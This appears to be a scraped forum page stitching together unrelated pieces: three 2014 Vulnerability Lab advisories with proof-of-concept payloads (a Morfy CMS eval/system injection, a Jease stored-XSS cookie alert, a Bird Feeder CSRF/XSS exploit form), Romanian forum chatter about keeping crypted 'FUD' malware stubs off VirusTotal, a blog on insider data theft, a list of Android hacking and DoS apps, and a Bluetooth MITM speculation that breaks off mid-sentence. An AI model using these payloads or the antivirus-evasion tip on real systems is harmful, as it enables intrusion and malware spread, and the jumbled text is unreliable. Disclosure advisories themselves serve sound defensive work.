Aerosol

Document Title: =============== Morfy CMS v1.05 - Command Execution Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1367 https://github.com/Awilum/monstra-cms/issues/351 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9185 CVE-ID: ======= CVE-2014-9185 Release Date: ============= 2014-12-10 Vulnerability Laboratory ID (VL-ID): ==================================== 1367 Common Vulnerability Scoring System: ==================================== 6.2 Product & Service Introduction: =============================== Morfy is a flat file CMS, this means there is no administration backend and database to deal with. You simply create .md files in the `content` folder and that becomes a page. To run Morfy you simple need PHP 5.3.0 or higher with PHP`s Multibyte String module. Operation system: Unix, Linux, Windows, Mac OS. Webserver: Apache with Mod Rewrite or Ngnix with Rewrite Module. (Copy of the Vendor Homepage: http://morfy.monstra.org/documentation ) Abstract Advisory Information: ============================== An independent Vulnerability Laboratory Researcher discovered a remote command execution vulnerability in the official Morfy v1.05 Content Management System. Vulnerability Disclosure Timeline: ================================== 2014-11-02: Researcher Notification & Coordination (Paulos Yibelo) 2014-12-10: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== GNU GPL License Product: Morfy - Content Management System 1.05 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A command execution web vulnerability has been discovered in the official Morfy v1.05 Content Management System. The vulnerability allows an attacker to unauthorized execution system specific commands that compromises the online web-application or connected dbms. The vulnerability is located in the site_url parameter of the default content management system install.php file. Remote attackers are able to execute system specific commands to compromise the application by usage of malicious requests that run through the vulnerable site_url value. The request method to inject the code is POST via Add. The security risk of the vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.2. Exploitation of the web vulnerability requires no privileged application user account or user interaction. Successful exploitation of the command execution vulnerability results in content management system compromise. Request Method(s): [+] POST Vulnerable Module(s): [+] Install Vulnerable File(s): [+] install.php Vulnerable Parameter(s): [+] site_url Proof of Concept (PoC): ======================= The vulnerability can be exploited by remote attackers without user interaction or privileged application user account. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the security vulnerability ... 1. Download the morfy content management system 2. Use the default and access the installation file (install.php) 3. Inject the following payload `website.com}','yibelo'=> eval("system('dir');"),` (as website url) by usage of the Add function 4. Then navigate to site.com/config.php which shall get executed because that will result site_url'='website.com}','yibelo'=>eval("system('dir');"),//', 5. Successful reproduce of the security vulnerability! Vulnerable Source: install.php < config.php ./install.php Line 57 $post_site_url = isset($_POST['site_url']) ? $_POST['site_url'] : ''; ./install.php Line 64-77 file_put_contents('config.php', "<?php return array( 'site_url' => '{$post_site_url}', 'site_charset' => 'UTF-8', 'site_timezone' => '{$post_site_timezone}', 'site_theme' => 'default', 'site_title' => '{$post_site_title}', 'site_description' => '{$post_site_description}', 'site_keywords' => '{$post_site_keywords}', 'email' => '{$post_email}', 'plugins' => array( 'markdown', 'sitemap', ), );"); Reference(s): http://morfy.127.0.0.1:8080/install.php http://morfy.127.0.0.1:8080/config.php Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure restriction in the config.php file that requests the vulnerable site_url value. Encode and parse the vulnerable site_url in the add input field of the installation module (install.php). Restrict the input fields and disallow special chars to prevent system specific command executions. Security Risk: ============== The security risk of the remote command execution vulnerability in the php engine of the web-application is estimated as high. (CVSS 6.2) Credits & Authors: ================== Paulos Yibelo [Independent Vulnerability Researcher] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source

Document Title: =============== Jease CMS v2.11 - Persistent UI Web Vulnerability References (Source): ==================== [url]http://www.vulnerability-lab.com/get_content.php?id=1373[/url] Release Date: ============= 2014-12-12 Vulnerability Laboratory ID (VL-ID): ==================================== 1373 Common Vulnerability Scoring System: ==================================== 3.7 Product & Service Introduction: =============================== Jease is an Open Source Content-Management-System which is driven by the power of Java. Jease means `Java with Ease`, so Jease promises to keep simple things simple and the hard things (j)easy. Content-Management with Jease. Jease is built on top of the most advanced open-source technologies existing in the Java-community. Jease glues these technologies together to provide an outstanding productive development experience by combining the safety and ide-/compiler-support of Java with the turn-around-times of scripting languages. (Copy of the Vendor Homepage: [url=http://www.jease.org/]The Java CMS with Ease | Jease[/url] ) Abstract Advisory Information: ============================== The independent Vulnerability Laboratory Researcher (Manideep K.) discovered a persistent input validation web vulnerability in the Jease 2.11 CMS. Vulnerability Disclosure Timeline: ================================== 2014-12-12: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Jease Product: Jease - Content Management System 2.11 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ An application-side input validation web vulnerability has been discovered in the official Jease v2.11 Content Management System. The vulnerability allows an attacker to inject own script code as payload to the application-side of the vulnerable service function. The vulnerability is located in the content values of the create function. Local attackers with low privileged application user accounts are able to manipulate the content input values by usage of the create functions. The execution of the persistent script code occurs in the view browser module of the content management system. The attack vector is persistent on the application-side and the request method to inject is POST. The issue allows to transfer persistent malicious script codes to the frontend service. The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.7. Exploitation of the application-side web vulnerability requires a low privileged web-application user account and low user interaction. Successful exploitation of the vulnerability results in persistent phishing mails, session hijacking, persistent external redirect to malicious sources and application-side manipulation of affected or connected module context. Request Method(s): [+] POST Vulnerable Module(s): [+] Create Vulnerable Parameter(s): [+] content Affected Module(s): [+] View - Browser Service Proof of Concept (PoC): ======================= The persistent input validation web vulnerability can be exploited by remote attackers without privileged application user account and with low user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Manual steps to reproduce: 1. Install the Content Management System 2. Open online service to interact (link - [url]http://jease.127.0.0.1:8080/login?file&auth[/url] 3. Click to include on any entry (Alternatively, you can create one and reproduce) and enter the following parameters in the Content section Note: (Select the plaintext option present at the end of the content box) 4. Enter “ <script>alert(document.cookie)</script> ” or “ <script>alert(document.cookie)</script> ” in the box and press view in browser option Note: the request got saved and is now persistent included to the browser module service 5. Successful reproduce of the vulnerability! Security Risk: ============== The security risk of the persistent input validation web vulnerability in the Jease CMS is estimated as medium. (CVSS 3.7) Credits & Authors: ================== Manideep K. - Information Security Researcher [[url]https://in.linkedin.com/in/manideepk][/url] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: [url=http://www.vulnerability-lab.com]Vulnerability Lab - VULNERABILITY RESEARCH LABORATORY[/url] - [url=http://www.vuln-lab.com]Vulnerability Lab - VULNERABILITY RESEARCH LABORATORY[/url] - [url=http://www.evolution-sec.com]Evolution Security " PenetrationTesting & IT-Security Services" | EVOLUTION SECURITY PENTESTING [DE|EU][/url] Contact: [email]admin@vulnerability-lab.com[/email] - [email]research@vulnerability-lab.com[/email] - [email]admin@evolution-sec.com[/email] Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or [email]research@vulnerability-lab.com[/email]) to get a permission. Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: [url=http://www.vulnerability-lab.com]Vulnerability Lab - VULNERABILITY RESEARCH LABORATORY[/url] CONTACT: [email]research@vulnerability-lab.com[/email] PGP KEY: [url]http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt[/url] Source

Document Title: =============== Bird Feeder v1.2.3 WP Plugin - CSRF & XSS Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1372 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9334 CVE-ID: ======= CVE-2014-9334 Release Date: ============= 2014-12-09 Vulnerability Laboratory ID (VL-ID): ==================================== 1372 Common Vulnerability Scoring System: ==================================== 3.6 Product & Service Introduction: =============================== This WordPress plugin will add the necessary data to the WordPress article feeds so that they can be picked up and processed correctly by the Bird Feeder Mint Pepper, without requiring any changes to any core WordPress files. This plug-in serves one purpose and that is to tweet published posts. It doesn`t do anything other then tweet. It tweets in this format: [your message] [post title] [short url].On the options page you will have to enter your twitter username and password. You can also configure your message there.If you try to publish a bunch of posts quickly Bird Feeder url shortening service will not handle them and result un-expected tweets. (Copy of the Vendor Homepage: https://wordpress.org/plugins/bird-feeder/ ) Abstract Advisory Information: ============================== The independent Vulnerability Laboratory Researcher (Manideep K.) discovered a cross site request forgery issue and a cross site vulnerability in the bird feeder v2.1 wordpress plugin. Vulnerability Disclosure Timeline: ================================== 2014-11-06: Author Notification (Manideep K.) 2014-11-20: WP Team action taken by closing the plugin and service 2014-12-09: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Wordpress Product: Bird Feeder - Wordpress Plugin (Web-Application) 1.2.3 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A cross site request forgery issue and cross site scripting vulnerability has been discovered in the Bird Feeder v1.2.3 Plugin. The plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a special crafted URL created by a remote attacker (via spear phishing/social engineering), the attacker can insert arbitrary script code into admin page. Once exploited, admin’s browser can be made to do almost anything the admin user could typically do by hijacking admin`s cookies etc. Proof of Concept (PoC): ======================= You can use the following exploit code to exploit the vulnerability. For testing - you can just save it as .html and then get it clicked with an logged in administrator (by social engineering/spear phishing techniques) and see exploit in action. Almost majority of the fields are vulnerable to CSRF + XSS attack <html> <body> <form action="http://localhost/wordpress/wp-admin/options-general.php?page=bird-feeder" method="POST"> <input type="hidden" name="user" value="csrf/xss testing " /> <input type="hidden" name="password" value="csrf/xss testing" /> <input type="hidden" name="message" value="" /> <input type="hidden" name="update" value="Update" /> <input type="submit" value="Submit request" /> </form> </body> </html> Solution - Fix & Patch: ======================= 2014-11-20: WP Team action taken by closing the plugin and service Security Risk: ============== The security risk of the cross site request forgery and cross site scripting web vulnerability are estimated as medium. (CVSS 3.6) Credits & Authors: ================== Manideep K. - Information Security Researcher [https://in.linkedin.com/in/manideepk] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source

coaie ai scanat stub-ul e cam acelasi lucru...

tu meriti sa fi banat, cum sa scanezi ma cu VIRUS TOTAL? o sa se duca tot fud-ul in 1/2 zile ... nu ai invatat nimic de cat timp esti aici? Virus Total trimite sample-uri la anti-virusi, deci NU SCANATI.

nu e nimic nou, adica sunt putini oamenii care au acces la internet ( in mare parte tineret) acum iti dai seama nu poti sa il pui pe "Costica sau pe Leana" la pc...

De cand activez in cadrul MailAgent, am observat cat de putina atentie ofera anumite companii sigurantei bazelor de date. Din punct de vedere al email marketing-ului, baza de date este cel mai de pret lucru pe care il poate avea o companie. Cu cat o baza de date este mai ingrijit culeasa, cu cat contine mai multe date demografice, cu atat poate sa fie mai utila pentru companie. Dar ce anume faceti pentru a va proteja baza de date de angajatul nemultumit? Mediul online Foarte multe companii lasa “la liber” accesul angajatilor la adresele de email personale (Yahoo, Gmail, etc.) sau la servicii de storage in cloud. De cele mai multe ori, angajatii nemultumiti sau care sunt pe picior de plecare, isi pregatesc terenul si isi trimit informatii confidentiale pe adresele de email personale. Ca si solutie, pe langa blocarea email-urilor consacrate, indicat ar fi sa se monitorizeze si comunicarile interne. O metoda simpla ar fi configurarea serverului de email, astfel ca tot ce se trimite si se primeste pe email intr-o companie sa se trimita si catre o adresa de email monitorizata. Mediul offline Memorii externe: nu stiu cate companii blocheaza accesul stick-urilor si ale hdd-urile externe pe calculatoarele de birou. De cand cu penetrarea puternica a smartphone-urilor, majoritatea angajatilor isi conecteaza telefonul la calculatorul de birou. Si acest lucru ar trebui monitorizat. CRM sau backoffice Dati tuturor acces la baza de date? Toate persoanele pot sa exporte baza de date din adminul siteului sau CRM-ul companiei? Este indicat ca accesul la baza de date sa se acorde numai anumitor persoane de incredere. Daca sunt mai multe persoane care au acces la baza de date, macar sa aiba fiecare user-ul si parola lui si sa se monitorizeze cine si ce exporta. In cadrul MailAgent am dezvoltat un sistem de useri foarte bine pus la punct. Daca in aplicatie trebuie sa lucreze mai mult de o persoana, se fac useri separati pentru toti cei care au nevoie. Astfel, se stie in orice moment daca cineva face un export al bazei de date, de la ce IP si la ce ora. Ne-am intalnit cu situatii cand persoana care lucra in aplicatie a fost concediata, iar aceasta odata ajunsa acasa, a exportat baza de date. Ca si practica, recomandam, ca intai, sa i se restrictioneze accesul angajatului in toate zonele de unde ar putea sa extraga informatii vitale si apoi aceasta sa fie concediat. Pe langa sistemul de multi user, mai exista si useri cu diferite nivele de acces. Astfel daca aveti un angajat care doar face layout-ul si il testeaza, acestuia i sa da un user doar cu acces la partea de compunere si trimitere a email-ului iar alt angajat are acces la bazele de date si rapoarte. Luand in considerare cele de mai sus, tu cum te-ai gandit sa-ti protejezi pe viitor baza de date, astfel incat sa preintampini un eveniment neplacut? Source

Am citit ce am postat stai linistit... cat despre vechimea postului tool-urile sunt utile... "De ce mai folosesti Windows ca e vechi" am modificat dSploit in zANTI link: https://www.zimperium.com/zanti-mobile-penetration-testing

Now days, smartphones and tablets are most the popular gadgets. If we see recent stats, global PC sale has also been decreasing for the past few months. The reason behind this is that people utilize tablets for most of their work. And there is no need to explain that Android is ruling global smartphone and tablet markets. Android is most popular mobile OS with more than 60% market share. So, companies are now focusing on bringing their software as a mobile app for Android. These apps include office apps, photo editing apps, instant messaging apps and penetration testing apps. If you have an Android smartphone, you can start your next penetration testing project from your Android phone. There are few android apps that can turn your Android device into a hacking device. Although, these apps have so many limitations and can only be used for few specific tasks. You can never get the same experience as you get with your PC. But smaller jobs can be performed. Apps for penetration testers are not available widely, but hackers can enjoy this platform in a better way. There are many Wi-Fi hacking and sniffing apps available. As we already said that Android is ruling smartphone and tablet markets, developers are also creating more apps for Android devices. This is the reason why the Android market has millions of apps. Like websites, apps also need penetration testing to check for various vulnerabilities. Security testing for Android apps will need to have a penetration testing environment on your Android device. Note: These apps are not for beginners because expertise is needed on the Android platform. Most of the apps work on Rooted Android devices. So root your Android device first. If you are not sure how to do it, learn how to by, reading one of the many sites available to help with this process. You will lose your device’s warranty if you root it, so think twice before proceeding. These apps can also harm your Android device. So please try these apps at your own risk. In this detailed post, we will see various apps for web application penetration testing, network penetration testing, sniffing, networking hacking and Android apps penetration testing. Android apps for Penetration testing 1. zANTI zANTI is a nice Android network penetration testing suit. It comes with all-in-one network analysis capabilities. Like most of the other penetration testing tools, it also comes for free. So, you can download and use this app on your Android device and perform network security testing. It has various pre-complied modules to use. The app is designed to be very fast, handy and easy to use, it’s just point and click. zANTI supports all Android devices running on Android 2.3 Gingerbread or higher, and you also need to root your device. If you are newbie, we will never recommend you to use the app if you don’t know how to root your Android device. After rooting your device, you need to install BusyBox Installer. Download BusyBox from Google Play Store: https://play.google.com/store/apps/details?id=com.jrummy.busybox.installer&hl=en Then download the app from the link given below. App is available on github: https://github.com/evilsocket/dsploit/downloads These are the available modules in the app. Update zANTI link : https://www.zimperium.com/zanti-mobile-penetration-testing outerPWN Trace Port Scanner Inspector Vulnerability Finder Login Cracker Packet Forger MITM 2. Network Spoofer Network Spoofer is another nice app that lets you change the website on other people’s computer from your Android phone. Download the Network Spoofer app and then log onto the Wi-Fi network. Choose a spoof to use with the app then tap on start. This app is considered as a malicious hacking tool by network administrators. So, don’t try on unauthorized networks. This is not a penetration testing app. It’s just to demonstrate how vulnerable the home network is. Download this app from sourceforge Network Spoofer | SourceForge.net 3. Network Discovery Network Discovery is a free app for the Android device. The good thing is that the app doesn’t need a rooted device. This app has a simple and easy to use interface. It views all the networks and devices connected to your Wi-Fi network. The application identifies the OS and manufacturer of the device. Thus the app helps in information gathering on the connected Wi-Fi network. Download app from Google Play: https://play.google.com/store/apps/details?id=info.lamatricexiste.network 4. Shark for Root Shark for Root is a nice traffic sniffer app for the Android device. It works fine on 3G and Wi-Fi: both network connectivity options. You can see the dump on phone by using Shark Reader that comes with the app. You can also use Wireshark a similar tool to open the dump on the system. So, start sniffing data on your Android device and see what others are doing. 5. Penetrate Pro Penetrate Pro is a nice Android app for Wi-Fi decoding. The latest version of the app has added many nice features. It can calculate the WEP/WAP keys for some wireless routers. If you have installed an Antivirus app, it may detect Penetrate Pro app as virus. But this app is a security tool and it will not affect or harm your device. Penetrate gives you the wireless keys of Discus, Thomson, Infinitum, BBox, Orange, DMax, SpeedTouch, DLink, BigPond, O2Wireless and Eircom routers. 6. DroidSheep [Root] DroidSheep is a session hijacking tool for Android devices. This is an app for security analysis in wireless networks. It can capture Facebook, Twitter, and LinkedIn, Gmail or other website accounts easily. You can hijack any active web account on your network with just a tap by using the DroidSheep app. It can hijack any web account. This app demonstrates the harm of using any public Wi-Fi. Download this app from here: Downloads | DroidSheep 7. DroidSheep Guard DroidSheep Guard is another Android app that also developed Droidsheep. This app does not require a rooted device. This app monitors Android devices’ ARP-table and tries to detect ARP-Spoofing attack on the network performed by DroidSheep, FaceNiff and other software. Download DroidSheep Guard from Google Play: https://play.google.com/store/apps/details?id=de.trier.infsec.koch.droidsheep.guard.free&feature=search_result 8. WPScan WpScan is the WordPress vulnerability scanner for Android devices. This nice app is used to scan a WordPress based website and find all the security vulnerabilities it has. WPScan also has a desktop version of the app that is much powerful than the Android app. We know that WordPress is one of the most popular CMS and is being used by millions of websites. The Android version of the app comes with few nice features. The app was released on Google Play but Google removed the app. The full source code of the app is available from Github. One thing to note that WPScan Android app is not related to the desktop version of WPScan. So, never think it as an official WPScan app. Download app and source code: https://github.com/clshack/WPScan 9. Nessus Nessus is a popular penetration testing tool that is used to perform vulnerability scans with its client/server architecture. It also released its mobile app to bring its power on mobile devices. Nessus Android app can perform following tasks. Connect to a Nessus server (4.2 or greater) Launch existing scans on the server Start, stop or pause running scans Create and execute new scans and scan templates View and filter reports This app was released on Google Play store almost 2 years back by Tenable Network Security. Later Google removed the app from Play store. Now the official link has been removed. So you can try downloading links available on third party websites. But be careful and check the app first. 10. FaceNiff FaceNiff is another nice sniffing app for Android devices. It requires a rooted Android device. It can sniff and intercept the web sessions over the Wi-Fi. This app is similar to DroidSheep, added earlier in the post. You can also say Firesheep for Android devices. Use of this app may be illegal in your area. So, use it wisely. 11. WebSecurify WebSecurify is a powerful web vulnerability scanner. It’s available for all popular desktops and mobile platforms. It has a powerful crawler to crawl websites and then attack it using pre-defined patterns. We have already covered it in detail in our previous article. You can read the older article for better understanding. Download it here: https://code.google.com/p/websecurify/ 12. Network Mapper Network Mapper is a fast scanner for network admins. It can easily scan your network and export the report as CVS to your Gmail. It lists all devices in your LAN along with details. Generally, the app is used to find Open ports of various servers like FTP servers, SSH servers, SMB servers etc. on your network. The tool works really fast and gives effective results. Download Network Mapper for Google Play Store: https://play.google.com/store/apps/details?id=org.prowl.networkmapper&hl=en 13. Router Bruteforce ADS 2 If you are connected to a wi-Fi network and you want to access the router of the network, you can use Router Bruteforce ADS 2 app. This app performs Bruteforce attack to get the valid password of the router. It has a list of default passwords that it tries on the router. Most of the time, the app cracks the password. But you cannot be 100% sure in Bruteforce attack. It comes with a sample txt file which contains 398 default passwords used in different routers. You can add more passwords in the list. But there is one limitation. This app only works with dictionary file of less than 5 MB. And try it only when you have good Wi-Fi signal. This is an experiment app and the developer also warns users to try at own risk. Download Router Bruteforce ADS 2 from Google Play: https://play.google.com/store/apps/details?id=evz.android.rbf_ads&hl=en 14. Andosid AnDOSid is another nice application that can be used to perform DOS attacks from Android mobile phones. It is like LOIC tool for desktop. In the app, you can set target URL, payload size and time difference between two requests. After that click on big GO button to launch DOS attack on a website. It will start flooding target URL with fake request. Use this app if you have a powerful device. Avoid if you have low cost entry level device. 15. AppUse – Android Pentest Platform Unified Standalone Environment AppUse Virtual Machine is developed by AppSec Labs. It’s a freely available mobile application security testing platform for Android apps. This android penetration testing platform contains custom made tools by AppSec Labs. This penetration testing platform is for those who are going to start penetration testing of Android applications. All you need is to download the AppUse Virtual Machine and then load the app for testing. The app comes with most of the configuration. So, you do not need to install simulators, testing tools, no need for SSL certifications of Proxy. Thus, the tool gives ideal user experience. In other words, you can say that AppUse Virtual Machine is Backtrack for Android apps. As we know that world is moving towards apps, AppUse VM has a good scope in future. We see how Android users face attacks and these cyber-attacks are growing. So, it is important for all Android app developers to test their apps for various kinds of vulnerabilities. Download AppUse Virtual machine Here Download AppUse from SourceForge.net Conclusion Android is one of the fastest growing mobile platforms with the biggest market share. People also claim that it could replace desktop OS as well. Although we do not agree with that but, we cannot ignore the importance of it. This is why developers are bringing their tools for Android platforms also. In this post, I have listed few Android apps for hackers and security researchers. You can say that these apps are not as powerful as desktop hacking tools. But you can still enjoy these hacking tools for most of your tasks. Most of the hacking apps are related to networking and spoofing. All these apps do this task on Wi-Fi. Few web scanners are also available that lets security researchers find vulnerability on web applications. You can also launch DOS attack on a website direct from your smartphone or tablet. This could be a better hacking tool. If you are into the security field, you can try these apps and see how these work. Source

When official details of the new features in Android 5.0 Lollipop were released last week, Android Smart Lock piqued my interest. It’s a lock screen controlling feature that uses Bluetooth connectivity between a user’s Android 5.0 devices to unlock phone, tablet, and smartphone screens when they’re within the broadcast range of another Android 5.0 smartwatch or Android Auto embedded system. It’s likely that Android’s development team tested the waters by collaborating with the Chrome OS development team. A feature called Easy Unlock entered the Chrome development channel last spring. If you enable the feature in the development channel and you’re a competent enough coder, you may be able to test Easy Unlock yourself. You may need to have both an Android mobile device and a Chromebook in developer mode, and enable the feature on both devices. If the code is workable by now, when properly configured it should allow you to unlock your Chromebook with your Android phone or tablet. I’m not sure which versions of Android, Chrome OS, or Chromium OS are needed, nor do I know what the package dependencies may be. So, if you’re going to try Easy Unlock, you’ll be doing so at your own risk. It’s possible that when Easy Unlock is stable, it’ll be renamed to Smart Lock, for unison with the new Android 5.0 feature. Smart Lock will probably be a handy feature for many users. But my concern is whether or not Smart Lock introduces significant new security vulnerabilities to the Android and Chrome OS ecosystem. There’s no publicly available technical documentation on Smart Lock as of this writing. But I do know that it uses Bluetooth for communication and authentication, which is probably the most pragmatic radio technology for its purpose. I can only speculate how Bluetooth is implemented for Smart Lock. Google recently acquired Impermium, so I’m optimistic that they kept security in mind. Here’s how the Bluetooth implementation may be attackable. How Can Bluetooth Be Attacked? For Defcon 2013, Charlie Miller and Chris Valasek demonstrated how the embedded systems in the 2010 models of the Ford Escape and the Toyota Prius can be penetrated. What their attack has in common with Android Smart Lock is that it’s a way to attack a car’s computer with Bluetooth. The major difference is that I’m not sure if Android Auto will have any access to a vehicle’s driving mechanisms. For that reason, I’ll speculate that Electronic Control Units that interact with the steering and breaking aren’t a component of Android Auto. Android Auto might just give passengers access to general Android apps and functions (SMS, etc.), with GPS navigation, weather, and traffic reports for the driver. But Miller and Valasek are among many researchers who have found ways to use Bluetooth to attack an embedded car system, which makes me concerned about the Bluetooth functionality in Android Auto, with or without ECUs. The most potentially destructive Bluetooth vulnerability is man-in-the-middle attacks. Bluetooth usually uses EAP-AKA (Extensible Authentication Protocol- Authentication and Key Agreement) or EAP-SIM (EAP- Subscriber Identity Module) for authentication when such a framework has been implemented. A Bluetooth device, such as one using Android 5.0?s Smart Lock, will acquire master keys from an authentication server. Bluetooth standards from 2.1 to 4.1 require encryption, which usually uses an AES algorithm. But encryption may be bypassed by conducting a man-in-the-middle attack, which involves spoofing packets with the headers that are used between a user’s authorized Bluetooth devices, which can be a computer and a peripheral, or two computers. Smart Lock communications are between two computers, as all devices running Android are. Bluetooth communication designates one device as the master and the other as the slave, but the two devices may frequently switch roles. . There’s a Bluetooth penetration testing suite called Bluediving. It has versions that run in Windows, GNU/Linux, and FreeBSD. Bluediving contains all the tools that are necessary for a man-in-the-middle attack. An attacker’s laptop running Bluediving should first sniff packets that are used in the Link Management Protocol process when one Smart Lock device authenticates with another. The man-in-the-middle attack can work if the attacker’s laptop is Bluetooth capable and connected to a WLAN, which may be open WiFi, or the attacker may 3G or 4G tether with their own phone or tablet. The sniffed packets contain the data the attacker’s laptop needs to bypass the encryption- an authentication code, a Master Session Key, and the encryption command. Those are exchanged during an EAP-AKA challenge. The attacker’s machine starts the spoof by replaying that traffic to whichever Smart Lock device is the slave. Now the slave thinks the attacker is the master. The attacker completes the EAP authentication process, which renders whatever encryption is implemented to be irrelevent. The attacker is decrypting now, and the cipher didn’t even need to be cracked. That’s because a new, compromised MSK has been generated for the attacker, through their own WLAN connection to an internet server. Although the Bluetooth standard has measures that address authentication, it lacks measures for integrity. Because of the lack of integrity verification in the standard, the attack is able to hijack the authentication procedure in order to spoof for a man-in-the-middle attack. Now that the attacker’s machine is the “man-in-the-middle,” if their machine has other software that can exploit vulnerabilities in Android 5.0 and Smart Lock, the attacker can truly wreak havoc. At the very least, with the successful man-in-the-middle attack, maliciously unlocking Smart Lock on the Android device that’s the Bluetooth slave should be a piece of cake. Through Smart Lock, the Android device will think the attacker is a legitimate user, so even the default filesystem encryption in Android 5.0 may be bypassed. That’s wonderful for the attacker, because cracking AES128 is a real pain in the ass. With 2014 technology, it could take a computing cluster years. The longer it takes to crack an encryption algorithm, the greater the risk is that the attacker will be caught. How Could Smart Lock’s Bluetooth Be Implemented More Securely? A more secure use of Bluetooth involves only having Bluetooth turned on when absolutely necessary, and having discoverability turned on only when the two legitimate Smart Lock are initially connecting. Here 